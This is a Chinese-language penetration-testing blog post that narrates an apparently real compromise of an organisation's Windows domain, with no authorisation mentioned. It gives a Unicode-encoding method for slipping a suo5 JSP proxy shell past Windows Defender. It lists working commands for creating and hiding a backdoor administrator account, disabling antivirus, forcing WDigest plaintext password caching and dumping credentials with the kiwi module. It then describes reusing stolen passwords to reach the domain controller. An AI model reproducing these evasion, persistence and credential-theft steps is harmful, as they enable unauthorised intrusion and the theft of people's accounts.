本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记
前文链接
- WAMP/DVWA/sqli-labs 搭建
- burpsuite工具抓包及Intruder暴力破解的使用
- 目录扫描,请求重发,漏洞扫描等工具的使用
- 网站信息收集及nmap的下载使用
- SQL注入(1)——了解成因和手工注入方法
- SQL注入(2)——各种注入
- SQL注入(3)——SQLMAP
- SQL注入(4)——实战SQL注入拿webshell
- Vulnhub靶机渗透之Me and My Girlfriend
- XSS漏洞
- 文件上传漏洞
- 文件上传绕过
- 文件包含漏洞
- Vulnhub靶机渗透之zico2
- 命令执行漏洞
- 逻辑漏洞(越权访问和支付漏洞)
- 网站后台安全
- weevely的使用及免杀(Linux中的菜刀)
- MSF(1)——一次完整的渗透流程
- WebShell命令执行限制(解决方案)
- 记一次艰难的SQL注入(过安全狗)
- MSF(2)——各种木马的生成及简单的免杀
- MSF(3)——apk和exe的加马(过360、火绒)
- 通过Frp解决实现内网穿透
- 改造冰蝎马,实现免杀之default_aes php
- 使用FofaSpider和Python联动批量挖洞
- 记一次简单的对盗号网站的渗透
- 记一次幸运的漏洞挖掘
- 记一次从外网打通AWS云
- 内网渗透初探
前言
外网打点是怎么拿的就不说了,跟前三篇博客一样。总之得到了一个jsp的webshell,执行cmd失败。

我上一篇博客说是哥斯拉的问题,其实不对,实际上是被Windows Defender制裁了,但是绕过的方法也很简单,把上篇博客的webshell上传上去就好了。
看一眼权限whoami

system,故事的开始总是这么完美。
看看杀软:tasklist /svc

Windows Defender,故事的开始总是有些遗憾。。
上线rdp
被杀软制裁
上一篇博客我是直接用内存注入上线了cs,但这台服务器的wd比较厉害上线不了cs,所以选择上线rdp。
可以查到rdp端口为默认的3389

但是外网无法连通,原因不明。

这边选择走suo5的代理然后用127.0.0.1上线。
直接上传suo5的jsp shell,瞬间被杀。

那还能咋办,免杀呗
suo5免杀
这边选择用Unicode加密的方法进行免杀。
大概的方法就是,jsp代码里边<%!%>围起来的定义片段和<%%>围起来的可执行代码片段,可以整体unicode加密,然后嵌在标识符里,是可以正常解析的。
例如原本的代码是:
<%!
public void hello(JspWriter out) throws Exception {
out.println("hello world");
}
%>
<%
hello(out);
%>
可以写成如下的形式,也可以正常解析:
<%! \u0070\u0075\u0062\u006C\u0069\u0063\u0020\u0076\u006F\u0069\u0064\u0020\u0068\u0065\u006C\u006C\u006F\u0028\u004A\u0073\u0070\u0057\u0072\u0069\u0074\u0065\u0072\u0020\u006F\u0075\u0074\u0029\u0020\u0074\u0068\u0072\u006F\u0077\u0073\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006F\u006E\u0020\u007B\u000A\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006F\u0075\u0074\u002E\u0070\u0072\u0069\u006E\u0074\u006C\u006E\u0028\u0022\u0068\u0065\u006C\u006C\u006F\u0020\u0077\u006F\u0072\u006C\u0064\u0022\u0029\u003B\u000A\u0020\u0020\u0020\u0020\u007D %>
<% \u0068\u0065\u006C\u006C\u006F\u0028\u006F\u0075\u0074\u0029\u003B %>

因此,通过此原理我们可以直接爆改我们的suo5.jsp,实现免杀。
由于代码太长,我这里只放一部分,实战中自己去加密替换就好了,要注意最前边导入的部分不能加密。
<%@ page import="java.nio.ByteBuffer" %><%@ page import="java.io.*" %><%@ page import="java.net.*" %><%@ page import="java.security.cert.X509Certificate" %><%@ page import="java.security.cert.CertificateException" %><%@ page import="javax.net.ssl.*" %><%@ page import="java.util.*" %>
<%! \u0070\u0075\u0062....... %>
<% \u0053\u0075\u006F......%>
直接上传,成功连接

上线
创了一个管理员用户,挂好代理,成功上线rdp
net user tt$ Tt@123456 /add
net localgroup Administrators tt$ /add
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v tt$ /t REG_DWORD /d 0 /f

先把wd关了,免得坏我好事。

抓密码
上线后因为未知原因无法上线cs,所以选择上线msf。

上线之后先改注册表抓明文密码:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

之后等待管理员登录就有密码了。
。。。。。
一天后,使用msf的kiwi模块抓密码。
先提到system权限getsystem

然后直接抓
load kiwi
creds_all

直接使用管理员凭证成功上线。

内网渗透
信息收集
在配置文件找到了数据库账号密码和邮箱账号密码


执行指令看看
ipconfig
systeminfo
把执行结果交给ai,得到如下信息:
| 项目 | 值 | 说明 |
|---|---|---|
| 本机 IP | 192.168.1.182 | 有线网卡 IPv4 地址,用于局域网访问 |
| 内网网段 | 192.168.1.0/24 | 对应子网掩码 255.255.255.0,可用 IP 范围 192.168.1.1–192.168.1.254 |
| 当前域 | 用的互联网域名,不能放 | 本机加入的域 |
| 域中权限 | 域成员工作站 (Member Workstation) | 不是域控制器,属于普通域成员,无管理整个域的权限 |
查一下域信息:nltest /dsgetdc:域名

域控IP是192.168.1.101
还是有点麻烦的。
密码复用
在系统里搜索.rdp文件,发现192.168.1.93的连接信息

赌一把,直接用抓到的密码登录,赌他们会密码复用!

赌赢了,成功上线

发现了ChatGPT的账号密码

拿下域控
还是密码复用,直接上线rdp

又找到一个数据库凭证

还在桌面上看到一个名叫pass.txt的文件

666演都不演了
总结
不要复用密码
3372

被折叠的 条评论
为什么被折叠?



